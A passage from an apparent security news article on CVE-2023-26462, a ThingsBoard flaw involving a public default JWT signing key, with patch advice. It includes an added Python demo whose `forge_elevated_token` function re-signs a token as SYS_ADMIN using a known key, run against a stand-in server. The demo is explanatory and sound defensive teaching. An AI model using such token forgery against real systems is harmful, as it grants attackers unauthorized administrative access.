The vulnerability, identified as CVE-2023-26462, was detected and reported by IBM Security X-Force researchers. An attacker who knows the default JWT signing key, which is far easier to obtain than a per-installation secret, could forge tokens that the system accepts as valid, and so appear to it as a higher-privileged user.
“Because ThingsBoard allowed the default key to be used without requiring administrators to change it, and because that default key was also exposed publicly in the configuration files, the door was opened for attackers to gain unauthorized access in excess of what is intended,” stated the X-Force researchers in a report.
The flaw was patched in ThingsBoard version 3.4.2, which generates a random signing key for each new installation; existing deployments are fixed by upgrading to 3.4.2 or later. If administrators are unable to upgrade immediately, they can manually change the default signing key in the configuration file of earlier versions or via the admin dashboard.
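The following is an added example, not code from the article or from ThingsBoard, that shows why a publicly known default signing key is fatal for an HS256 JWT scheme: the same HMAC key both creates and verifies tokens, so anyone who has it can mint tokens with whatever claims they like. The key value, the claim layout (`sub`, `scopes`) and the role names are placeholders chosen for illustration; the `Server` class is a stand-in for any application that derives authorisation from the token's claims. The second function shows the effect of the fix, a random per-installation key, under which the same forgery is rejected.

```python
import base64
import binascii
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Placeholder standing in for a product's publicly documented default key
# (illustrative value, not any vendor's real configuration).
DEFAULT_SIGNING_KEY = b"defaultSigningKeyFromPublicConfig"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def mint_jwt(claims: dict, key: bytes) -> str:
    """Build an HS256 JWT: b64url(header).b64url(payload).b64url(HMAC-SHA256)."""
    header = json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":"))
    payload = json.dumps(claims, separators=(",", ":"))
    signing_input = _b64url(header.encode()) + "." + _b64url(payload.encode())
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_jwt(token: str, key: bytes) -> Optional[dict]:
    """Return the claims if the HS256 signature is valid under `key`, else None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        signature = _b64url_decode(s)
    except (ValueError, binascii.Error):
        return None
    if header.get("alg") != "HS256":  # refuse alg confusion ("none", RS256, ...)
        return None
    expected = hmac.new(key, (h + "." + p).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(_b64url_decode(p))


class Server:
    """Minimal stand-in for an application that trusts JWT claims for authorisation."""

    def __init__(self, signing_key: bytes):
        self.signing_key = signing_key

    def login(self, user: str, role: str) -> str:
        # Issue a token for a legitimately authenticated low-privilege user.
        return mint_jwt({"sub": user, "scopes": [role]}, self.signing_key)

    def effective_role(self, token: str) -> str:
        claims = verify_jwt(token, self.signing_key)
        return claims["scopes"][0] if claims else "ANONYMOUS"


def forge_elevated_token(victim_token: str, known_key: bytes) -> str:
    """Attacker: keep the legitimate subject, rewrite the scope, re-sign with the known key."""
    _, p, _ = victim_token.split(".")
    claims = json.loads(_b64url_decode(p))
    claims["scopes"] = ["SYS_ADMIN"]  # placeholder for the highest privilege level
    return mint_jwt(claims, known_key)


def demo_default_key() -> str:
    """Server left on the public default key: the forged admin token is accepted."""
    vulnerable = Server(DEFAULT_SIGNING_KEY)
    low = vulnerable.login("customer@example.com", "CUSTOMER_USER")
    forged = forge_elevated_token(low, DEFAULT_SIGNING_KEY)
    return vulnerable.effective_role(forged)


def demo_random_key() -> str:
    """Server with a random per-installation key: the same forgery fails verification."""
    hardened = Server(secrets.token_bytes(32))
    low = hardened.login("customer@example.com", "CUSTOMER_USER")
    forged = forge_elevated_token(low, DEFAULT_SIGNING_KEY)
    return hardened.effective_role(forged)


if __name__ == "__main__":
    print("default key  ->", demo_default_key())   # SYS_ADMIN
    print("random key   ->", demo_random_key())    # ANONYMOUS
```

Note that the attacker never needs the victim's password: a low-privilege token is only used here to copy a plausible `sub`, and even that is optional once the key is known. The manual mitigation in the text (changing the key in the configuration file or dashboard) is exactly what `demo_random_key` models, and it also invalidates every token issued under the old key, so users are logged out after the change.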
Insecure Implementation of JSON Web Tokens
JSON Web Token (JWT, RFC 7519) is an Internet standard for stateless authentication. It is widely used in mobile and web applications, and especially where interactive authentication is impractical, such as machine-to-machine or service-to-service communication.
[…]